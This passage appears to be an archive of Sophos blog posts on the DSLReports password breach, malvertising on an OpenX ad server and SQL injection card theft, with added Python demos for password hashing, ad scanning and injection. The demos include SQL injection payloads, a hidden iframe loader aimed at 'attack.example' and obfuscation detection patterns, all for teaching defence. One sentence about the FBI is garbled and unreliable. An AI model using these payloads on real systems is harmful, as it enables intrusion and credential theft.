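# Hypothetical policy threshold: more distinct customer identifiers than this in
# one outbound message means it is held for a human to look at.
MAX_RECORDS = 10


def sample_rows(n):
    """Constructed customer records; names, numbers and addresses are invented."""
    return [
        (f"Fan {i}", f"{i} Main St", f"212-555-{i:04d}", f"fan{i}@example.org", f"Sec {i}")
        for i in range(n)
    ]


def build_sample_message(rows):
    """Constructed outbound mail with a CSV 'spreadsheet' attached (sample data)."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["name", "address", "phone", "email", "seat"])
    writer.writerows(rows)
    msg = EmailMessage()
    msg["From"] = "ticket-sales@example.com"
    msg["To"] = "affiliates@example.com"
    msg["Subject"] = "Season ticket holders"
    msg.set_content("Attached is the list you asked for.")
    msg.add_attachment(buf.getvalue(), subtype="csv", filename="ticket_holders.csv")
    return msg.as_bytes()


def extract_text_parts(raw):
    """Yield (part name, decoded text) for the body and every text/* attachment."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        payload = part.get_payload(decode=True)
        if payload is not None:
            yield part.get_filename() or "body", payload.decode("utf-8", "replace")


def count_identifiers(text):
    """Distinct phone numbers and e-mail addresses in one blob of text."""
    return {
        "phones": len(set(PHONE_RE.findall(text))),
        "emails": len(set(EMAIL_RE.findall(text))),
    }


def scan_outbound_message(raw, max_records=MAX_RECORDS):
    """Return (allow, findings); allow is False when any part exceeds the limit."""
    findings = {name: count_identifiers(text) for name, text in extract_text_parts(raw)}
    worst = max((max(counts.values()) for counts in findings.values()), default=0)
    return worst <= max_records, findings


if __name__ == "__main__":
    allow, findings = scan_outbound_message(build_sample_message(sample_rows(21)))
    print("allow:", allow)
    for name, counts in findings.items():
        print(f"  {name}: {counts}")
```

Counting distinct identifiers per part, rather than matching on a single pattern, is what separates a customer list from a normal business e-mail that happens to contain one phone number; a real deployment would add address, card and account patterns and scan binary spreadsheet formats as well.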

Later this afternoon DSLReports.com disclosed that they had been the victims of a SQL injection attack that succeeded in stealing usernames and passwords. Justin, the owner of DSLReports, wrote in a forum message that a “sql injection attack by a botnet on wednesday afternoon obtained a large number of email / password pairs.”

Strangely, Justin stated that he had notified account holders who either created their accounts in the last 12 months, or had logged in over the last 12 months. This seems like a terrible practice. Many users have had accounts for more than 10 years and may not even remember having created one.

To not notify everyone who may have been affected seems to be a lapse in judgement, but it gets worse. All of the passwords in DSLReports’ database were in clear text. No hashing, no salting, totally unencrypted.
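What "no hashing, no salting" costs is easy to show. The following is an added example in Python, not DSLReports' code: a cleartext store next to a salted PBKDF2-HMAC-SHA256 store, and what a dump of each table hands to whoever pulled it out through the injection. The e-mail addresses, passwords and the iteration count are made up.

```python
import hashlib
import hmac
import os

# Hypothetical work factor; raise it as far as your login latency budget allows.
ITERATIONS = 100_000


def store_cleartext(table, email, password):
    """What the breached site did: the password itself goes into the table."""
    table[email] = password


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Salted PBKDF2-HMAC-SHA256, serialised with everything needed to verify later."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def store_hashed(table, email, password):
    """Store only the salted hash; the password never touches the database."""
    table[email] = hash_password(password)


def verify_password(stored, candidate):
    """Recompute with the stored salt and compare in constant time."""
    algorithm, iterations, salt_hex, digest_hex = stored.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    recomputed = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(recomputed, bytes.fromhex(digest_hex))


def dump_table(table):
    """What a SQL injection that reads the whole table hands the attacker."""
    return dict(table)


if __name__ == "__main__":
    # Constructed users; two of them chose the same password.
    clear, hashed = {}, {}
    for email, pw in [("a@example.org", "hunter2"), ("b@example.org", "hunter2")]:
        store_cleartext(clear, email, pw)
        store_hashed(hashed, email, pw)
    print("cleartext dump:", dump_table(clear))
    print("hashed dump:   ", dump_table(hashed))
    print("login ok:", verify_password(hashed["a@example.org"], "hunter2"))
```

Two things to notice in the hashed dump: the two users with the same password get different records because each has its own salt, so the attacker cannot even tell that they match, and the attacker has to spend the full iteration count per guess per user instead of reading the password off the page.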

Once again we find that if we re-use passwords for seemingly unimportant websites, we may be putting our reputations at risk. You can count on the attackers trying to use these email addresses and passwords on as many popular sites as possible.

They may only use them to spread forum spam, but do you really want your name/profile/identity associated with this kind of activity?

Creative Commons image of New York Yankees helmet courtesy of Mr. T in DC’s Flickr photostream.

Posted in Sophos

Compromised ads leading to TDSS rootkit infections

As we all know, compromised sites play an important role in web-distributed malware, acting as the conduit that guides user traffic to further malicious content. Sometimes the attackers get lucky and succeed in compromising a high-profile, popular site. Another way to increase the number of users exposed to the attack is to compromise advertising content, thereby exposing all users of any third-party sites that happen to load the ads.

Late yesterday evening, we started to see evidence of such an attack – Sophos products were blocking certain ad content as Mal/Iframe-U.

Knowing that detection and what it looked for, I was pretty sure that the ad server of Campus Party was compromised.

Sure enough, I could see that in addition to the desired ads (for the July Campus Party event in Valencia), the content also contained malicious JavaScript (highlighted in yellow in the screenshot, not reproduced here).

Not the first time I have seen an OpenX ad-server getting compromised, and I suspect it won’t be the last.

Deobfuscating the JavaScript reveals the payload. As our Mal/Iframe-U detection name suggests, it is an iframe to load further malicious content from a remote server.

This initiates the attack, triggering a chain of events summarised below:

  • the ad content (pro-actively blocked as Mal/Iframe-U) silently loads content from the attack site.
  • the user's browser and browser plug-ins are inspected to determine the most appropriate exploit content to load. For this, a legitimate plug-in detection library is used.
  • exploit content (e.g. Mal/HcpExpl-A, Troj/Lifsect-A, Mal/ExpJS-M) is loaded in order to infect the user with malware. At the time of writing, the exploit site is serving up a rootkit which Sophos products detect as Mal/TDSSPack-AX.

As is typically the case for today’s web attacks, all of the script components used are heavily obfuscated in an attempt to thwart detection efforts and hinder analysis.
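A site operator who serves third-party ad markup can run a cheap first-pass check of their own. The following is an added example in Python, not Sophos' detection logic and not the actual Campus Party payload: it walks ad HTML with the standard-library parser, flags iframes that are sized or styled to be invisible, and flags script blocks that show the usual loader markers (eval, unescape, String.fromCharCode, document.write, long runs of percent- or hex-encoded bytes). The benign banner, the injected iframe and the hostnames "campus-party.example" and "attack.example" are all constructed placeholders.

```python
import re
from html.parser import HTMLParser

# Heuristics for script content typical of injected malvertising loaders.
OBFUSCATION_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode\s*\("),
    "document.write": re.compile(r"document\.write\s*\("),
    "encoded_blob": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}|(?:%[0-9a-fA-F]{2}){8,}"),
}


class AdContentScanner(HTMLParser):
    """Collects hidden iframes and obfuscation markers inside <script> blocks."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._script = None  # list of text chunks while inside a <script>

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "iframe":
            style = (attrs.get("style") or "").replace(" ", "").lower()
            tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
            hidden = "display:none" in style or "visibility:hidden" in style
            if tiny or hidden:
                self.findings.append(("hidden_iframe", attrs.get("src") or ""))
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script)
            self._script = None
            for name, pattern in OBFUSCATION_PATTERNS.items():
                if pattern.search(body):
                    self.findings.append(("obfuscated_script", name))


def scan_ad_html(html):
    """Return a list of (finding type, detail) tuples for one piece of ad markup."""
    scanner = AdContentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def _pct_encode_all(text):
    """Percent-encode every character, the way loader scripts hide their markup."""
    return "".join("%%%02X" % ord(c) for c in text)


# Constructed samples; the hosts are reserved placeholder names, not real sites.
BENIGN_AD = (
    '<div class="ad"><a href="http://campus-party.example/">'
    '<img src="banner.png" width="300" height="250"></a>'
    "<script>var impressions = 0; impressions++;</script></div>"
)
INJECTED_IFRAME = '<iframe src="http://attack.example/in.php" width=1 height=1></iframe>'
MALICIOUS_AD = BENIGN_AD + (
    "<script>document.write(unescape('" + _pct_encode_all(INJECTED_IFRAME) + "'));</script>"
)

if __name__ == "__main__":
    print("benign:   ", scan_ad_html(BENIGN_AD))
    print("malicious:", scan_ad_html(MALICIOUS_AD))
```

These markers are heuristics, not a verdict: legitimate ad code also calls document.write, so a single hit deserves a look rather than a block, while unescape plus a long encoded blob in the same script is the shape the post describes and is worth pulling the creative immediately.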

We have already informed those at Campus Party about this issue in order that they can get the malvertising attack cleaned up as soon as possible. In fact as I type, I can see that the ad server is already offline, presumably whilst they resolve the issue. Kudos to them for actioning this quickly!

As to the root cause of the compromise, I do not know exactly how the server was compromised. However, given history, my money would be on an out of date or unpatched version of OpenX.

Posted in Sophos


Data thefts far more common than just Sony and Epsilon

In the wake of the press reports concerning the recent data breaches at Sony and Epsilon, some organizations are getting the wrong idea about modern online attacks. The media largely chooses to cover mass-scale losses that affect large numbers of consumers from trusted brands.

While it is important to raise awareness about keeping your data safe online and alerting average internet users that they may be victims of data theft, most users are exposed to risk far more frequently and without their knowledge.

In a story published Tuesday on the Bank Information Security blog, Tracy Kitten detailed the exploits of Rogelio Hackett, Jr., who stole more than 675,000 credit cards. The resulting damages exceeded $36 million.

Hackett’s strategy? Find smaller organizations who have not coded their websites properly, allowing access to their data via SQL injection vulnerabilities. Based upon the reports I see from customers and other researchers, there are likely hundreds, if not thousands, of Hacketts out there systematically looking for low-hanging fruit.
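Both the DSLReports breach above and Hackett's method come down to the same coding mistake, so one added example covers both. This is illustrative Python using SQLite, not code from either site: a login query built by string concatenation, the same query with bound parameters, and two constructed attacker inputs, one that dumps every email/password pair through a UNION and one that turns the WHERE clause into a tautology. The users, passwords and payload strings are invented.

```python
import sqlite3


def make_db():
    """Constructed user table with passwords stored in clear, as in the breaches above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT NOT NULL, password TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice@example.org", "s3cret"), ("bob@example.org", "hunter2")],
    )
    return conn


def login_vulnerable(conn, email, password):
    """String concatenation: the attacker's input becomes part of the SQL grammar."""
    query = (
        "SELECT email FROM users WHERE email = '" + email + "' "
        "AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(query)]


def login_parameterised(conn, email, password):
    """Bound parameters: input is data, never SQL, whatever characters it contains."""
    rows = conn.execute(
        "SELECT email FROM users WHERE email = ? AND password = ?",
        (email, password),
    )
    return [row[0] for row in rows]


# Constructed attacker input: closes the string, appends a UNION that returns
# every email/password pair, and comments out the rest of the original query.
DUMP_PAYLOAD = "x' UNION SELECT email || ':' || password FROM users -- "
# Constructed tautology for the password field: matches every row.
TAUTOLOGY = "' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, dump payload:  ", sorted(login_vulnerable(conn, DUMP_PAYLOAD, "anything")))
    print("vulnerable, tautology:     ", sorted(login_vulnerable(conn, "x", TAUTOLOGY)))
    print("parameterised, dump payload:", login_parameterised(conn, DUMP_PAYLOAD, "anything"))
    print("parameterised, real creds:  ", login_parameterised(conn, "alice@example.org", "s3cret"))
```

The parameterised version is not "escaping done right"; it is a different interface, where the database driver never sees the input as part of the statement at all. That is why it holds against inputs nobody thought to filter, which is the category an attacker scanning thousands of small sites is counting on.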

Hackett may be sentenced to 12 years in prison for his crimes, but for every attacker who is caught, another one is ready to fill his shoes.

The FBI issued an security hubs.

Posted in Sophos

Security Status

  • Beware Facebook "Timeline" scams http://t.co/W5EW0cVv
  • Nigerian government (unknowingly) hosts phishing website http://t.co/uQd42ENw
  • PCMag Awards McAfee All Access its Editors' Choice: SANTA CLARA, Calif.--(BUSINESS WIRE)--McAfee today announced... http://t.co/FakV7Vd8
  • RT @mikko: I hadn't noticed Google Maps has added 3D models of buildings. Here's a (very accurate) view of F-Secure HQ in Helsinki http://t.co/IKfAZlak
  • North Koreans aren't known for their online presence. But others may be lured into clicking Kim Jong-Il 'videos' too http://t.co/yQOon6YT
  • How to Protect Your Professional Reputation on Facebook Timeline http://t.co/I4bcR2VN
  • This is pretty impressive from @Softpedia: Facebook scans 2 trillion link clicks and blocks 220 million posts each day http://t.co/vKsn9gNl
  • Need for integrated approach to security in industrial control systems - http://t.co/tPBCNOow with @PikeResearch
  • Some free-based music we play at work http://t.co/xu5agZfc
  • Japan's cyber defense weapon: a virus. It includes quotes by @Luis_Corrons via @InfosecurityMag